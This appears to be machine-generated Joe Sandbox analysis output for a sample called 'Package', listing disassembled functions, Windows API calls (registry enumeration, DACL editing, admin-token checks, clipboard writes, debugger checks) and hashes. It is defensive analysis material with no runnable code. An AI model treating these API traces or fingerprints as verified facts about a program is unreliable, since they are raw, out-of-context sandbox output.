Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: __wgetmainargs
String ID:
API String ID: 1709950718-0
Opcode ID: 13bb754127196aeb69a5b4c5b242558c56e53911d8fa4bf28cf8685e22820fff
Instruction ID: 83ae385bcf2248c77ceb46ff67cf47a1251c7c9c3366a34b0dc7b05de0e74465
Opcode Fuzzy Hash: 13bb754127196aeb69a5b4c5b242558c56e53911d8fa4bf28cf8685e22820fff
Instruction Fuzzy Hash: A2D0C7715903017F8600DB14BC0BCC53EDFAE39B117158025B4D1D1161DFE243B08700

Function 001FE18B Relevance: 1.5, APIs: 1, Instructions: 10windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000000B,?,00000000), ref: 001FE19A

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: b644d130c0ade5e5a32bf35af6dded48f574745d4a9ef784f52fe242ca6d737f
Instruction ID: 8752532d9a64a27939a78c95f729f5e122f8ac9032305ce3b77ec35be5fe9cff
Opcode Fuzzy Hash: b644d130c0ade5e5a32bf35af6dded48f574745d4a9ef784f52fe242ca6d737f
Instruction Fuzzy Hash: B7C04C72140208B7D6211B51EC09F867E69E795762F514011B618190A18B7394629654

Function 002055E4 Relevance: 1.5, APIs: 1, Instructions: 10windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001102,00000000,00000003), ref: 002055F7

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 01974795a0d8c222267e32215b50b32073da037cf5ae48d4c7ccb1eb4dce4f66
Instruction ID: 3d00dce3aff90a4cbf1312d9cf6fc9df8f582b002f4f382b212546f020f83470
Opcode Fuzzy Hash: 01974795a0d8c222267e32215b50b32073da037cf5ae48d4c7ccb1eb4dce4f66
Instruction Fuzzy Hash: 59C00236040108BB9B026B91EC09CC57F6AEB99762B518011B658090618B739962AB50

Non-executed Functions

Function 00209634 Relevance: 51.2, APIs: 23, Strings: 6, Instructions: 469registrystringwindowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0020963E
RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,0000009C,0020ACE5,?,?), ref: 0020966E
RegEnumValueW.ADVAPI32(?,00000000,00000000,?,00000000,?,00000000,?), ref: 002097A0
wsprintfW.USER32 ref: 00209854
wsprintfW.USER32 ref: 0020986C
wsprintfW.USER32 ref: 00209925
wsprintfW.USER32 ref: 0020993B
lstrcpyW.KERNEL32(?,?), ref: 00209956
#538.MFC42U(00000000), ref: 0020997D
#538.MFC42U(00000000,00000000), ref: 00209996
#800.MFC42U(?,?,?,00000000,00000000), ref: 002099D6
#800.MFC42U ref: 002099EF
SendMessageW.USER32(?,00001132,00000000,?), ref: 00209A0F
RegEnumValueW.ADVAPI32(?,?,00000000,?,00000000,?,00000000,?), ref: 00209A41
RegOpenKeyExW.ADVAPI32(?,00000000,00000000,00020019,?), ref: 00209AB4
#538.MFC42U(00000000), ref: 00209AC2

Part of subcall function 00209634: memset.MSVCRT ref: 00209884
Part of subcall function 00209634: _itow.MSVCRT ref: 002098C3
Part of subcall function 00209634: lstrcpyW.KERNEL32(00000000,<cannot coerce data to string>), ref: 002098FD
Part of subcall function 00209634: #800.MFC42U(00000000), ref: 00209AE7
Part of subcall function 00209634: SendMessageW.USER32(?,00001102,00000002,00000000), ref: 00209AFE
Part of subcall function 00209634: RegCloseKey.ADVAPI32(?), ref: 00209B07

RegEnumKeyW.ADVAPI32(?,00000000,00000000,?), ref: 00209B16

Strings

%s [%s] = %s, xrefs: 00209933
<cannot coerce data to string>, xrefs: 002098F7
%s = %s, xrefs: 00209916
%s [<no name>] = %s, xrefs: 0020991D
%#04X%04X (%lu), xrefs: 0020984E
%#08X (%lu), xrefs: 00209866

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: wsprintf$#538#800Enum$MessageSendValuelstrcpy$CloseH_prolog3InfoOpenQuery_itowmemset
String ID: %#04X%04X (%lu)$%#08X (%lu)$%s = %s$%s [%s] = %s$%s [<no name>] = %s$<cannot coerce data to string>
API String ID: 88432742-3653656851
Opcode ID: 5cbb444dbbaa531bdc202358e5803996fcaa44667cac5c7c32c9827cfda80a5b
Instruction ID: c7a6f14051a9e6cd84ac4a5989fc463c8284fe8bbf2e5de34a9d9112a1cc67a3
Opcode Fuzzy Hash: 5cbb444dbbaa531bdc202358e5803996fcaa44667cac5c7c32c9827cfda80a5b
Instruction Fuzzy Hash: A7F15E71921309AFDB15DFA8DC85AFEB7B8EF19300F10442AF516E7292EB709951CB60

Function 00204899 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 162stringCOMMON

Download Yara Rule

APIs

#1662.MFC42U ref: 002048D9
#540.MFC42U ref: 002048F3
lstrcpyW.KERNEL32(?,00000000), ref: 00204912
CreateBindCtx.OLE32(00000000,?), ref: 00204936
MkParseDisplayName.OLE32(?,00000000,00000000,00000000), ref: 00204971
#2644.MFC42U ref: 002049D1
#2810.MFC42U(?,MkParseDisplayName(... "%s" ...) failed.,?), ref: 002049E9
#800.MFC42U(?,00000000), ref: 00204A19
lstrlenW.KERNEL32(?), ref: 00204A30
#2810.MFC42U(?,Warning: MkParseDisplayName only ate up to "%s".,?), ref: 00204A82
#2644.MFC42U ref: 00204B42
#800.MFC42U ref: 00204B5D

Strings

MkParseDisplayName(... "%s" ...) failed., xrefs: 002049DD
Warning: MkParseDisplayName only ate up to "%s"., xrefs: 00204A76

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #2644#2810#800$#1662#540BindCreateDisplayNameParselstrcpylstrlen
String ID: MkParseDisplayName(... "%s" ...) failed.$Warning: MkParseDisplayName only ate up to "%s".
API String ID: 3470803309-1365492349
Opcode ID: 09672d2ec7db23e643ed9aabb0045a061a857047e6be78a1146a0fccbb3ccd75
Instruction ID: 1d5891c9b91173a8301f753aeb6b6b7114165c009d2b1326390107f2e7a15426
Opcode Fuzzy Hash: 09672d2ec7db23e643ed9aabb0045a061a857047e6be78a1146a0fccbb3ccd75
Instruction Fuzzy Hash: 3E81BD7595122CAFCB60EBA4EC8CBD9B7B4FB58311F1041E5E509A72A1DB34AE84CF14

Function 0020BF00 Relevance: 18.2, APIs: 12, Instructions: 165memoryCOMMON

Download Yara Rule

APIs

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0020BF47
GetLastError.KERNEL32(?,?,?,?,?,?,?,?), ref: 0020BF51
GetExplicitEntriesFromAclW.ADVAPI32(?,?,?), ref: 0020BF7F
SetEntriesInAclW.ADVAPI32(?,?,00000000,?), ref: 0020BF94
MakeAbsoluteSD.ADVAPI32(?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?), ref: 0020BFBD
MakeAbsoluteSD.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?), ref: 0020C018
SetSecurityDescriptorDacl.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0020C030
MakeSelfRelativeSD.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 0020C044
LocalAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0020C053
MakeSelfRelativeSD.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 0020C065
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 0020C0A0

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: Make$AbsoluteDaclDescriptorEntriesLocalRelativeSecuritySelf$AllocErrorExplicitFreeFromLast
String ID:
API String ID: 559786115-0
Opcode ID: 4a930dd44123ff11b2914f9253f6dd842bc9d2d34f6d627d8138fe31cf72bdd5
Instruction ID: d604f0b557b377f7c33ff21a1b46282c0975328f39554e9abd95413da0a30095
Opcode Fuzzy Hash: 4a930dd44123ff11b2914f9253f6dd842bc9d2d34f6d627d8138fe31cf72bdd5
Instruction Fuzzy Hash: 8A51D8B2910219AFDB21DF95EC88EEFBBBDFF18750B104026FA05E2151D7349A54CBA0

Function 00203450 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 132clipboardmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 002078ED: GetFocus.USER32 ref: 002078ED
Part of subcall function 002078ED: #2859.MFC42U(00000000), ref: 002078F4

Part of subcall function 00207980: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0020798C

GlobalAlloc.KERNEL32(00002002,00000200), ref: 00203522
GlobalLock.KERNEL32(?), ref: 00203534
StringFromGUID2.OLE32(-00000008,?,00000028), ref: 00203553
wsprintfW.USER32 ref: 00203650
GlobalUnlock.KERNEL32(?), ref: 0020365F
EmptyClipboard.USER32 ref: 00203670
SetClipboardData.USER32(0000000D,?), ref: 0020367E
CloseClipboard.USER32 ref: 00203684

Part of subcall function 002078FA: SendMessageW.USER32(?,0000113E,00000000,00000014), ref: 0020790C

Strings

P, xrefs: 00203624
<object classid="clsid:%s"></object>, xrefs: 00203645

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: ClipboardGlobal$MessageSend$#2859AllocCloseDataEmptyFocusFromLockStringUnlockwsprintf
String ID: <object classid="clsid:%s"></object>$P
API String ID: 2486233384-3677239044
Opcode ID: 4cae41901400fbec222604afc6a47b1377066e3dd973b0fca47470c9e5335187
Instruction ID: c0b7aba73d2778697d99741db300c04bdeb4bcce9747ab5eba4c613f27932b34
Opcode Fuzzy Hash: 4cae41901400fbec222604afc6a47b1377066e3dd973b0fca47470c9e5335187
Instruction Fuzzy Hash: E751B274A113288FDB60EF64DD49B99B7B5FF18300F0041EAE549A7291DB745E94CF11

Function 0020DA20 Relevance: 13.6, APIs: 9, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00020008,000000FF), ref: 0020DA51
OpenProcessToken.ADVAPI32(00000000), ref: 0020DA58
malloc.MSVCRT ref: 0020DA69
GetTokenInformation.ADVAPI32(000000FF,00000002,00000000,00008000,?), ref: 0020DA81
AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0020DAA2
EqualSid.ADVAPI32(00000004,?), ref: 0020DABD
FreeSid.ADVAPI32(00000000), ref: 0020DAE4
free.MSVCRT ref: 0020DAEF
CloseHandle.KERNEL32(000000FF), ref: 0020DAFF

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: ProcessToken$AllocateCloseCurrentEqualFreeHandleInformationInitializeOpenfreemalloc
String ID:
API String ID: 4152120180-0
Opcode ID: bc84baf8eb1e220526b48f702b295c337a55625ee035676d3241819b33832f63
Instruction ID: b46fdd4a10515aebea588f8ad8c92e14eb7094dc28e032c65a11ad5800680b4e
Opcode Fuzzy Hash: bc84baf8eb1e220526b48f702b295c337a55625ee035676d3241819b33832f63
Instruction Fuzzy Hash: 97319F31A1131AAFDB20EFE5EC8DAAFBBB8FF14711F114129E516A21D1DB309A11CB50

Function 00202EF0 Relevance: 10.6, APIs: 7, Instructions: 69clipboardmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 002078ED: GetFocus.USER32 ref: 002078ED
Part of subcall function 002078ED: #2859.MFC42U(00000000), ref: 002078F4

Part of subcall function 00207980: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0020798C

GlobalAlloc.KERNEL32(00002002,00000080), ref: 00202F82
GlobalLock.KERNEL32(?), ref: 00202F8E
StringFromGUID2.OLE32(-00000008,?,00000028), ref: 00202FA3
GlobalUnlock.KERNEL32(?), ref: 00202FAC
EmptyClipboard.USER32 ref: 00202FBA
SetClipboardData.USER32(0000000D,?), ref: 00202FC5
CloseClipboard.USER32 ref: 00202FCB

Part of subcall function 002078FA: SendMessageW.USER32(?,0000113E,00000000,00000014), ref: 0020790C

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: ClipboardGlobal$MessageSend$#2859AllocCloseDataEmptyFocusFromLockStringUnlock
String ID:
API String ID: 1702833241-0
Opcode ID: 400a2fa8eff9b0cb838632e048319b4ab18491e4b6972e07e8fde1911d2f9560
Instruction ID: af52cc12432a9e25bd81a796a0394c05c3b05ae69c6a278d430a447de5b7e388
Opcode Fuzzy Hash: 400a2fa8eff9b0cb838632e048319b4ab18491e4b6972e07e8fde1911d2f9560
Instruction Fuzzy Hash: EA215530E10309EBDF14AFA4D84E7ADBBB0EF58301F108069E516A62E2EB345E54CF50

Function 0020C9DB Relevance: 9.1, APIs: 6, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81469d3c03a9a342dc889cb82813d895190dfe0045c426988ac3a79ba8d3af7f
Instruction ID: e68eb62271a6af85fde1fc692ca8a73482732ce9d7de99063cfc15142b8c29d7
Opcode Fuzzy Hash: 81469d3c03a9a342dc889cb82813d895190dfe0045c426988ac3a79ba8d3af7f
Instruction Fuzzy Hash: D321E9B7A2021AEFD714DF94DC49ABEB768DB14350F30422AF905EA1D1EB749D109760

Function 0020FE37 Relevance: 9.1, APIs: 6, Instructions: 74COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0020FE45
memset.MSVCRT ref: 0020FE6B
memset.MSVCRT ref: 0020FEF5
IsDebuggerPresent.KERNEL32 ref: 0020FF11
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0020FF31
UnhandledExceptionFilter.KERNEL32(?), ref: 0020FF3B

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandledmemset$DebuggerFeatureProcessor
String ID:
API String ID: 1045392073-0
Opcode ID: bad1a1181de839953ec836ceeb8083da5ce1c278ab18f25207a81514c8dbac0c
Instruction ID: 3288bc5231e88eab86544d8a9a5ee237421e7b4116161c8d1cc9ebf0298c5ac9
Opcode Fuzzy Hash: bad1a1181de839953ec836ceeb8083da5ce1c278ab18f25207a81514c8dbac0c
Instruction Fuzzy Hash: 2A313C75D5531D9BDB20DFA1D989BCCBBB8AF18300F1040A9E40CA7290EB719A84CF04

Function 0020FCE5 Relevance: 7.6, APIs: 5, Instructions: 50timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 0020FD12
GetCurrentProcessId.KERNEL32 ref: 0020FD21
GetCurrentThreadId.KERNEL32 ref: 0020FD2A
GetTickCount.KERNEL32 ref: 0020FD33
QueryPerformanceCounter.KERNEL32(?), ref: 0020FD48

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: bef7e4513c6f4711e86c01c3beb39862b0c71f9cd15456646a38b6b801dc8275
Instruction ID: 0450a58b54c574c482652f3a6d6c2ba6a7da0b4262aaa15f08f48ac84425699e
Opcode Fuzzy Hash: bef7e4513c6f4711e86c01c3beb39862b0c71f9cd15456646a38b6b801dc8275
Instruction Fuzzy Hash: 9F113A71D11208ABCF20DFB8EA486DEB7F5FF68315F618866D409E7250EB319B408B00

Function 6C4E1865 Relevance: 6.1, APIs: 4, Instructions: 70COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 6C4E1871
IsDebuggerPresent.KERNEL32 ref: 6C4E193D
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6C4E1956
UnhandledExceptionFilter.KERNEL32(?), ref: 6C4E1960

Memory Dump Source

Source File: 00000003.00000002.1980006560.000000006C4E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4E0000, based on PE: true

Associated: 00000003.00000002.1979976908.000000006C4E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980034324.000000006C4EF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980058655.000000006C4F6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980085144.000000006C4F8000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4e0000_Package.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 9f480d9fe46ff4ed6b0cfbaa7cc10d0f510e32c6e5920b55a26f3f501ccd1d5a
Instruction ID: 469d40c89e3f3be9b86aafc6be67068a5f378f9baa350b7d5316ce050a7e99d4
Opcode Fuzzy Hash: 9f480d9fe46ff4ed6b0cfbaa7cc10d0f510e32c6e5920b55a26f3f501ccd1d5a
Instruction Fuzzy Hash: 80310875D012189BDF60DFA4D949BCDBBB8BF08305F1141AAE50CAB251EB719B84CF85

Function 0020F4CC Relevance: 6.0, APIs: 4, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,0020F602,(;!), ref: 0020F4D3
UnhandledExceptionFilter.KERNEL32(0020F602,?,0020F602,(;!), ref: 0020F4DC
GetCurrentProcess.KERNEL32(C0000409,?,0020F602,(;!), ref: 0020F4E7
TerminateProcess.KERNEL32(00000000,?,0020F602,(;!), ref: 0020F4EE

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: c19773a253a7e590f7307e6f5a2f7752335bd2a14bf9e6eef34438d576a73ddb
Instruction ID: d55d6754932a8829ff94682f43c9d64c591fa6d5e14b30daef00e69f3cfea52f
Opcode Fuzzy Hash: c19773a253a7e590f7307e6f5a2f7752335bd2a14bf9e6eef34438d576a73ddb
Instruction Fuzzy Hash: 87D0CA72040208BBCB003BE1FC0DB8D3E28EBB8712F8A8410F70E83420DF3188818B61

Function 6C4E5312 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6C4E540A
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6C4E5414
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6C4E5421

Memory Dump Source

Source File: 00000003.00000002.1980006560.000000006C4E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4E0000, based on PE: true

Associated: 00000003.00000002.1979976908.000000006C4E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980034324.000000006C4EF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980058655.000000006C4F6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980085144.000000006C4F8000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4e0000_Package.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 52d29681356c0746906b83de9945b97fbafb32e55dddedf59f300d76ed55f457
Instruction ID: 02be89bf21be3e5aa8696cb01575ca0d090720329ad25d477669b43b5de01642
Opcode Fuzzy Hash: 52d29681356c0746906b83de9945b97fbafb32e55dddedf59f300d76ed55f457
Instruction Fuzzy Hash: E131B37490121C9BCB21DF64D888BDCBBB4BF0C315F5142DAE41CA6651E7709B85CF45

Function 6C4EE135 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6C4EE130,?,?,00000008,?,?,6C4EDD33,00000000), ref: 6C4EE362

Memory Dump Source

Source File: 00000003.00000002.1980006560.000000006C4E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4E0000, based on PE: true

Associated: 00000003.00000002.1979976908.000000006C4E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980034324.000000006C4EF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980058655.000000006C4F6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980085144.000000006C4F8000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4e0000_Package.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 7fc9b04be88f5f56ebdb8c05149ea4f9fd5c095ae8e68cae6a921456d022a3d4
Instruction ID: fefd1e533224da81cc1b31aadb5d1ef111306291f92d7a5473577a36d3043b87
Opcode Fuzzy Hash: 7fc9b04be88f5f56ebdb8c05149ea4f9fd5c095ae8e68cae6a921456d022a3d4
Instruction Fuzzy Hash: 0BB10A315106089FD705CF28C4C6F557BA1FF4936AF268658E9A9CF7A1C335E992CB80

Function 6C4E1A28 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6C4E1A3E

Memory Dump Source

Source File: 00000003.00000002.1980006560.000000006C4E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4E0000, based on PE: true

Associated: 00000003.00000002.1979976908.000000006C4E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980034324.000000006C4EF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980058655.000000006C4F6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980085144.000000006C4F8000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4e0000_Package.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 386fdb6f8a055fe501a01123042f09d90cc3084e629b5a57d63623ff9a70ad5c
Instruction ID: c9eece759654d802394ee9bb87965dbfadb2f57252003cb4bf279783807a9330
Opcode Fuzzy Hash: 386fdb6f8a055fe501a01123042f09d90cc3084e629b5a57d63623ff9a70ad5c
Instruction Fuzzy Hash: D551AFB2A512158FEB04DFA4D881BAEBBF1FB8E306F21812AC421EB751D774D950CB50

Function 0020FAC0 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0001FA70), ref: 0020FAC5

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 4e5398635e1ae09df703f746eb14b11279de2c2c861199db228f86c05252cbb1
Instruction ID: e6b287172c6e8b5050d39a7755db7954e9f670c397cf96e37bbf624f9efdb88d
Opcode Fuzzy Hash: 4e5398635e1ae09df703f746eb14b11279de2c2c861199db228f86c05252cbb1
Instruction Fuzzy Hash: 6A9002A43E130456875067706D1D94525905A697127868460A44EC5495EF5040909511

